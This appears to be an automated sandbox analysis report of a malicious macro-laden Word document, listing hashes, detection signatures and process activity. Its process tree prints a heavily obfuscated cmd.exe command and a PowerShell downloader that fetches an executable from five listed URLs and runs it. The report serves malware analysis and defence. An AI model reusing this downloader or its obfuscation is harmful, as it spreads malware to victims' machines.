Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
08-09-2024 06:51
General
-
Target
d3c91738ad52ede18e7c98de0d688ee4_JaffaCakes118.doc
-
Size
79KB
-
MD5
d3c91738ad52ede18e7c98de0d688ee4
-
SHA1
b86e74fc6dc8d932006f3c189a743ed020cc0f77
-
SHA256
6dc235b67ec03448dd547ba027bb18ebb7131429138a85b9aaf9dc74933e1683
-
SHA512
f5dff51d938b2585f7b270a441ce23645b70906f566da72b7ea2ff1fad8beb97c257e6582657a6d84f5141172bc929388a19b9cf9c7e2af32b20a1a31226b4c1
-
SSDEEP
1536:vJK+lhLocn1kp59gxBK85fBt+a9pjduedt9+d5paxyN2:vJbla41k/W48jjduedt9+d5paxyQ
Score
10/10
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 2 IoCs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Start PowerShell.
-
Drops file in Windows directory 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d3c91738ad52ede18e7c98de0d688ee4_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\SysWOW64\cmd.execmd /V^:^O/C"^se^t M^y=)^Z^W^$YNG^uz^i^E^sJ^SB^p^Oc^4e^x^}@^\at^[/^o^w^Q^L^IP]^jF(^g^l5r^ynq^T^k^0m^-'^2b.U^:^,^1^f^d^ ^{^h;v=^M^+&&^f^or %^2 ^in (15,^2^8,^29,^19^,4^1,^1^1,6^2,^19,^39^,^3^9^,60,^3^,7^,^11^,6^2,^65^,^50^,8,^9^,1,50,63^,3,4^,31,^8^,^6^5^,^50^,^6^2,^25,2^5,^15^,^55,^2^7^,^2^7,^59,^7^,62^,^2^8,1^7,3^8,25^,1^7,^5^3,1^7^,^2^8^,^4^8,27^,3^9,4^4,25^,^15,2^2,62,^2^5,2^5^,15,^55^,27^,27,^52,19^,1^1^,^2^5^,25,4^1^,^2^4^,^64^,19,^39,11,^53^,3^9^,^9^,^64,19,^2^7^,4^0,^1^5^,5^4^,^2^2^,6^2,2^5^,^25,^15^,55,^27,^2^7,^1^1,^24^,^9^,^1^1^,^9^,59^,5^9^,62,53,1^7^,2^8^,4^8^,^2^7,4,2^8^,^2,1^,^59,^18,^2^2,^6^2,^25,^2^5^,15,^55,^27^,2^7,9,4^3,^11,7,4^8,1^9,^2^0^,53,17,2^8,^4^8,^53^,^4^8^,^20^,2^7,8^,4^5^,66^,5^9^,^5^1^,22,^62,^2^5,2^5^,^1^5,^5^5,^2^7,^27^,3^8^,9,^24^,4^3,^38,4^3^,38^,^7^,42^,^1^9^,^4^3^,^41,19^,^2^4,^39^,53^,^1^7,28^,4^8,2^7,^45^,50,^53,1^3,1^5^,3^9^,^9,^25,^3^7,^50^,22,50^,0,^6^3^,^3^,^3^5^,^48^,^64^,65,^37,^26,13^,4^2,1^1,2^5^,1^9,^4^8,^5^3^,^3^2^,^1^6^,^5^3^,33^,24^,2^5,^6^2^,^34^,55,^55,6,1^9^,2^5,^4^5,^1^9^,^4^8,^1^5^,^33^,2^4,25,^6^2^,^37^,0^,^67,5^0,2^3^,^12,^30,9,5^3^,^19^,2^0,^1^9,50,^0^,^6^3^,3,36,46,^30,^6^0,^65^,^5^,^1^9,^29,^4^9,^1^6,^52,3^5^,^1^9,^17^,^2^5,60^,4^9^,^1^7^,^2^8^,^48,60,50^,^4^8^,^1^1,^20^,4^8^,^39,51,5^3,20,48^,^3^9^,6^2,25,25^,^1^5,^50,^6^3^,^3^,^1,^4^6^,4^8,60^,^6^5^,^6^0,^5^,^1^9^,29,4^9,16,^5^2,^35,19^,1^7^,^25,^60^,49^,^1^7^,^28^,^4^8^,6^0,^5^0^,^2^4^,5^9^,^2^8,^5^9,5^2^,5^3^,11^,25,^4^1,^19,^2^4,4^8^,^50,63,^58^,^2^8^,^4^1,19^,^2^4^,^1^7,^6^2^,^37,3,3^5^,^2^8^,44^,60,9,^4^3,60^,^3,^4,31,^8,0,61^,25,^41^,^4^2^,^61,3^,^3^6,^4^6,30^,^5^3^,^2^8,15,^19,4^3^,^3^7,50,^6,^1^0,45^,50^,^5^6,^3^,3^5,28,^4^4^,^5^6,^4^7,0,6^3^,^3,3^6,46,3^0^,53,11^,19,43,59^,^3^7,0,6^3^,^3^,1^,^46,^48^,^53,28^,1^5^,19^,^43,^3^7,0^,6^3,^3,1,46^,^4^8,^5^3,^25^,42,^1^5^,^1^9,^60^,65,^6^0^,^57^,6^3^,^3^,^1^,46^,48^,53,29^,4^1^,^9^,25^,19,37^,^3,^3^6^,4^6^,3^0,^53^,^4^1,19^,1^1,1^5^,^28,4^3,11^,^1^9,14,^2^8,59^,^42,0,63,^3,1,4^6,4^8^,^5^3^,1^1,24^,6^4,19^,25^,^28^,^58,9,^3^9,^1^9^,3^7^,3,35,^4^8^,64,0,^63,^1^3,^25^,2^4^,4^1,25,49^,^33^,4^1,^2^8^,1^7^,1^9^,11^,1^1,60,^3^,^3^5^,^4^8^,6^4^,^6^3^,52,41,1^9,2^4,46^,^2^1,^17,2^4,^2^5^,^1^7,^6^2,^6^1^,2^1,21,60^,^60^,^60^,6^0,60^,60^,6^0^,60,60,^60^,60^,6^0^,6^0,60,^60,6^0^,^60,69)^do ^s^et ^B^1=!^B^1!!M^y:~%^2,1!&&^if %^2=^=^69 c^a^l^l %^B^1:*^B1!^=%"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $ush='ziZ';$YLz='http://duhocgtc.com/lqtp@http://besttravels.live/5pU@http://saisiddh.com/YoWZd4@http://insumex.com.mx/zTMd2@http://giangnguyenreal.com/T'.Split('@');$jmv=([System.IO.Path]::GetTempPath()+'\JQi.exe');$FkQ =New-Object -com 'msxml2.xmlhttp';$Zkm = New-Object -com 'adodb.stream';foreach($joq in $YLz){try{$FkQ.open('GET',$joq,0);$FkQ.send();$Zkm.open();$Zkm.type = 1;$Zkm.write($FkQ.responseBody);$Zkm.savetofile($jmv);Start-Process $jmv;break}catch{}}3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotmFilesize
19KB
MD52c7be22cec7fb9aba52db13ec9fce84f
SHA182ba8b5262d8348e0add74ede565e6065401c4d5
SHA256cf29639e47e72e8674bf7af43ada3e67305d264b5c193d14001b895e0758953a
SHA5126d2331a6fc7df533c637c7aceac6891e0f4b7363f0124ec2fc5502dee8e3c33e88caddb54392ba9c683c8c597c157c9c4b0e5fa0972aa9f3384e9b021e6010c8
-
memory/2660-7-0x00000000004E0000-0x00000000005E0000-memory.dmpFilesize
1024KB
-
memory/2660-8-0x00000000004E0000-0x00000000005E0000-memory.dmpFilesize
1024KB
-
memory/2660-5-0x00000000004E0000-0x00000000005E0000-memory.dmpFilesize
1024KB
-
memory/2660-10-0x00000000004E0000-0x00000000005E0000-memory.dmpFilesize
1024KB
-
memory/2660-4-0x00000000004E0000-0x00000000005E0000-memory.dmpFilesize
1024KB
-
memory/2660-11-0x00000000004E0000-0x00000000005E0000-memory.dmpFilesize
1024KB
-
memory/2660-2-0x000000007140D000-0x0000000071418000-memory.dmpFilesize
44KB
-
memory/2660-0-0x000000002F711000-0x000000002F712000-memory.dmpFilesize
4KB
-
memory/2660-9-0x00000000004E0000-0x00000000005E0000-memory.dmpFilesize
1024KB
-
memory/2660-6-0x00000000004E0000-0x00000000005E0000-memory.dmpFilesize
1024KB
-
memory/2660-15-0x000000007140D000-0x0000000071418000-memory.dmpFilesize
44KB
-
memory/2660-16-0x00000000004E0000-0x00000000005E0000-memory.dmpFilesize
1024KB
-
memory/2660-17-0x00000000004E0000-0x00000000005E0000-memory.dmpFilesize
1024KB
-
memory/2660-1-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2660-37-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2660-38-0x000000007140D000-0x0000000071418000-memory.dmpFilesize
44KB